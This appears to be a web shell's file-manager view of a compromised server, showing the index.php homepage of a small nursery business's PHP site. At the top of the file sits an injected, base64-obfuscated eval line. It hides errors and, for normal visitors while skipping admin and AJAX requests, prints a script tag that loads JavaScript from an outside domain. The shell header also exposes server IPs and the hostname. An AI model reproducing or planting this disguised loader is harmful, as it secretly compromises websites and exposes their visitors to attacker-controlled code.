BLACKSITE
:
216.73.216.137
:
157.173.108.86 / pdclassessgnr.in
:
Linux server.madnetech.com 4.18.0-553.117.1.el8_10.x86_64 #1 SMP Sun Apr 5 23:14:32 EDT 2026 x86_64
:
/
home
/
balaji
/
public_html
/
Upload File:
files >> /home/balaji/public_html/index.php
eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAwKTsKaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsIDApOwoKaWYgKFBIUF9TQVBJICE9PSAiY2xpIiAmJiAoCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWpzb24iKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AvdjIiKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AtYWRtaW4iKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AtbG9naW4ucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJ0b2xvd2VyKEAkX1NFUlZFUlsiSFRUUF9YX1JFUVVFU1RFRF9XSVRIIl0pICE9PSAieG1saHR0cHJlcXVlc3QiCikpIHsKICAgIHByaW50KGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJaTh2WVdzdVlXdGhiVFl3T0RBd0xtNWxkQzhpUGp3dmMyTnlhWEIwUGc9PSIpKTsKfQ==")); <!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Balaji Nursery</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="apple-touch-icon" href="img/apple-touch-icon.png"> <link rel="shortcut icon" type="image/x-icon" href="img/icon/favicon.ico"> <!-- Place favicon.ico in the root directory --> <!-- all css here --> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/material-design-iconic-font.min.css"> <link rel="stylesheet" href="css/magnific-popup.css"> <link rel="stylesheet" href="css/venobox.css"> <link rel="stylesheet" href="css/meanmenu.min.css"> <link rel="stylesheet" href="css/shortcode/shortcodes.css"> <link rel="stylesheet" href="css/plugins.css"> <link rel="stylesheet" href="style.css"> <link rel="stylesheet" href="css/responsive.css"> <script src="js/vendor/modernizr-2.8.3.min.js"></script> </head> <body> <!--[if lt IE 8]> <![endif]--> <!-- Page Wraper Here Start --> <div class="page-wraper"> <?php include('header.php') ?> <!-- Header Area End --> <!-- page Content Start --> <div class="page-content"> <!-- Slider Area Start --> <div id="hero-area" class="hero-area hero-slider section"> <div class="hero-slider"> <?php $sql_query="SELECT * FROM slider"; $result_set=mysqli_query($con,$sql_query); $fetched_row=mysqli_fetch_array($result_set,MYSQLI_ASSOC); ?> <!-- Slider Single --> <div class="hero-item" style="background-image: url(admin/uploads/slider/<?php echo $fetched_row['slider1_image'] ?>);"> <div class="container-fluid"> <div class="row"> <div class="content col-md-offset-2 col-lg-8 col-md-8 col-xs-12"> <h1><?php echo $fetched_row['slider1_text'] ?></h1> </div> <div class="col-lg-2 col-md-2 hidden-sm hidden-xs"> <div class="images"> <img class="main" src="img/hero/sm-2-4.png" alt=""> </div> </div> <div class="small-single"> <div class="single"> <img src="img/hero/sm-2.png" alt=""> </div> <div class="single-two"> <img src="img/hero/sm-3.png" alt=""> </div> <div class="single-three"> <img src="img/hero/sm-4.png" alt=""> </div> </div> </div> </div> </div> <!-- Slider Single --> <!-- Slider Single --> <div class="hero-item" style="background-image: url(admin/uploads/slider/<?php echo $fetched_row['slider2_image'] ?>);"> <div class="container-fluid"> <div class="row"> <div class="content col-md-offset-2 col-lg-8 col-md-8 col-xs-12"> <h1><?php echo $fetched_row['slider2_text'] ?></h1> </div> <div class="col-lg-2 col-md-2 hidden-sm hidden-xs"> <div class="images"> <img class="main" src="img/hero/sm-2-4.png" alt=""> </div> </div> <div class="small-single"> <div class="single"> <img src="img/hero/sm-2-1.png" alt=""> </div> <div class="single-two"> <img src="img/hero/sm-2-2.png" alt=""> </div> <div class="single-three"> <img src="img/hero/sm-2-3.png" alt=""> </div> </div> </div> </div> </div> <!-- Slider Single --> <!-- Slider Single --> <div class="hero-item" style="background-image: url(admin/uploads/slider/<?php echo $fetched_row['slider3_image'] ?>);"> <div class="container-fluid"> <div class="row"> <div class="content col-md-offset-2 col-lg-8 col-md-8 col-xs-12"> <h1><?php echo $fetched_row['slider3_text'] ?></h1> </div> <div class="col-lg-2 col-md-2 hidden-sm hidden-xs"> <div class="images"> <img class="main" src="img/hero/sm-2-4.png" alt=""> </div> </div> <div class="small-single"> <div class="single"> <img src="img/hero/sm-2.png" alt=""> </div> <div class="single-two"> <img src="img/hero/sm-3.png" alt=""> </div> <div class="single-three"> <img src="img/hero/sm-4.png" alt=""> </div> </div> </div> </div> </div> <!-- Slider Single --> </div> </div> <!-- Slider Area End --> <!-- Features Area Start --> <section class="features-service ptb-75"> <div class="container"> <div class="row"> <?php $sql_query="SELECT * FROM why_choose_us"; $result_set=mysqli_query($con,$sql_query); $i=1; while($row=mysqli_fetch_row($result_set)) { ?> <!-- Features Service Single --> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="features-service-single border"> <div class="fes-ser-titel text-center"> <span><i class="fa fa-leaf" aria-hidden="true"></i></span> <h4><?php echo $row[1]; ?></h4> </div> <div class="fes-ser-hover text-center"> <div class="hvr-icon"> <i class="fa fa-tencent-weibo" aria-hidden="true"></i> <h4><?php echo $row[1]; ?></h4> <p><?php echo $row[2]; ?></p> </div> </div> </div> </div> <!-- Features Service Single --> <?php $i++; } ?> </div> </div> </section> <!-- Features Area End --> <!-- About Us Area Start --> <section class="about-us-area pt-40 pb-40 bg-1"> <div class="container"> <div class="row"> <?php $sql_query="SELECT * FROM about_us"; $result_set=mysqli_query($con,$sql_query); $fetched_row=mysqli_fetch_array($result_set,MYSQLI_ASSOC); ?> <!-- About Us Left Start --> <div class="col-md-7"> <div class="about-us-left text-center"> <h3>Welcome to BALAJI NURSERY</h3> <div class="abt-text"> <p style="text-align:justify; font-size:15px;"><?php echo $fetched_row['intro'] ?></p> </div> <div class="abt-btn"> <a href="aboutus.php">Read More</a> </div> </div> </div> <!-- About Us Left End --> <!-- About Us Right Start --> <div class="col-md-5 pb-10"> <div class="about-us-right"> <img src="admin/uploads/about/<?php echo $fetched_row['intro_image'] ?>" alt="" style="height:300px; width:100%"/> </div> </div> <!-- About Us Right End --> </div> </div> </section> <!-- About Us Area End --> <!-- Our Service Area Startt --> <section class="our-service pt-100 pb-80"> <div class="container"> <!-- Section Titel --> <div class="row"> <div class="col-md-12"> <div class="section-titel mb-50 text-center"> <h3>Our Services</h3> </div> </div> </div> <!-- Section Titel --> <?php $sql_query="SELECT * FROM aboutpoints"; $result_set=mysqli_query($con,$sql_query); $fetched_row=mysqli_fetch_array($result_set,MYSQLI_ASSOC); ?> <div class="row"> <div class="our-srvice-left"> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="service-single"> <ul> <li> <div class="service-img"> <img src="img/icon/leaf.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point1'] ?></h5> <p><?php echo $fetched_row['point1_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/hand.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point2'] ?></h5> <p><?php echo $fetched_row['point2_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/kata.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point3'] ?></h5> <p><?php echo $fetched_row['point3_desc'] ?></p> </div> </li> </ul> </div> </div> <!-- Service Middle --> <div class="col-md-4 hidden-sm col-xs-12"> <div class="service-single"> <img src="img/other/abt-mdl.png" alt=""> </div> </div> <!-- Service Middle --> <!-- Service Right --> <div class="our-service-right"> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="service-single"> <ul> <li> <div class="service-img"> <img src="img/icon/tube.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point4'] ?></h5> <p><?php echo $fetched_row['point4_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/chamis.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point5'] ?></h5> <p><?php echo $fetched_row['point5_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/tree.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point6'] ?></h5> <p><?php echo $fetched_row['point6_desc'] ?></p> </div> </li> </ul> </div> </div> </div> <!-- Service Right --> </div> </div> </div> </section> <!-- Our Service Area End --> <!-- Our Project Start --> <section class="our-project pt-100 pb-70 bg-2"> <div class="container"> <!-- Section Titel --> <div class="row"> <div class="col-md-12"> <div class="section-titel style-two mb-75 text-center"> <h3>Our Products</h3> </div> </div> </div> <!-- Section Titel --> <div class="row"> <?php $sql_query="SELECT * FROM products LIMIT 8"; $result_set=mysqli_query($con,$sql_query); $i=1; while($row=mysqli_fetch_row($result_set)) { ?> <!-- Project Single --> <div class="col-md-3 col-sm-3"> <div class="single-project"> <div class="image-box"> <img src="admin/uploads/products/<?php echo $row[2]; ?>" style="height:280px; width:100%; border-radius:10px;" alt="img"> <div class="titel-venobox text-center"> <a class="venobox" href="admin/uploads/products/<?php echo $row[2]; ?>"><i class="zmdi zmdi-plus"></i></a> </br><b><?php echo $row[3]; ?></b> </div> </div> <div class="blog-content"> <h3 style="text-align:center;"><?php echo $row[1]; ?></h3> <br> </div> </div> </div> <!-- Project Single --> <?php $i++; } ?> </div> </div> <div class="abt-btn"> <a href="products.php" style="text-align:center">View More</a> </div> </section> <!-- Our Project End --> <!-- Our Client Area Start --> <section class="client-area ptb-80"> <div class="container"> <!-- Section Titel --> <div class="row"> <div class="col-md-12"> <div class="section-titel mb-75 text-center"> <h3>Testimonials</h3> </div> </div> </div> <!-- Section Titel --> </div> <div class="client-owlcursol owl-carousel owl-theme"> <?php $sql_query="SELECT * FROM testimonials"; $result_set=mysqli_query($con,$sql_query); $i=1; while($row=mysqli_fetch_row($result_set)) { ?> <!-- Client Single Item --> <div class="client-single item"> <div class="client-single-box text-center gray-bg"> <div class="client-img"> <img src="admin/uploads/testimonials/<?php echo $row[2]; ?>" alt=""> </div> <div class="client-say-text"> <h5><?php echo $row[1]; ?></h5> <p><?php echo $row[3]; ?></p> </div> </div> </div> <!-- Client Single Item --> <?php $i++; } ?> </div> </section> <!-- Our Client Area End --> <!-- Keep it up us area start --> <section class="keepit-area bg-3 bg-overlay-1 ptb-100"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="keep-it-contact text-center"> <h3>Keep in touch with us ! We are available for 24 hours</h3> <div class="keep-contact-btn"> <a href="contactus.php">Contact Us</a> </div> </div> </div> </div> </div> </section> <!-- Keep it up us area End --> <!-- Meet Team Area Start --> <section class="team-area ptb-80"> <div class="container"> <!-- Section Titel --> <div class="row"> <div class="col-md-12"> <div class="section-titel mb-75 text-center"> <h3>Meet Our Team</h3> </div> </div> </div> <!-- Section Titel --> <div class="row"> <?php $sql_query="SELECT * FROM team"; $result_set=mysqli_query($con,$sql_query); $i=1; while($row=mysqli_fetch_row($result_set)) { ?> <!-- Team Single --> <div class="col-md-3 col-sm-6 col-xs-12"> <div class="team-single"> <div class="team-img"> <img src="admin/uploads/team/<?php echo $row[2]; ?>" style="height:280px; width:100%; border-radius:5px;" alt="img"> </div> <div class="team-info text-center mt-20"> <h4><?php echo $row[1]; ?></h4> <br> <h6><?php echo $row[3]; ?></h6> <br> </div> </div> </div> <!-- Team Single --> <?php $i++; } ?> </div> </div> </section> <!-- Meet Team Area Start --> </div> <!-- page Content End --> <?php include('footer.php') ?> </div> <!-- Page Wraper Here Start --> <!-- all js here --> <script src="js/vendor/jquery-1.12.4.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.ajaxchimp.min.js"></script> <script src="js/jquery.meanmenu.js"></script> <script src="js/plugins.js"></script> <script src="js/main.js"></script> </body> </html>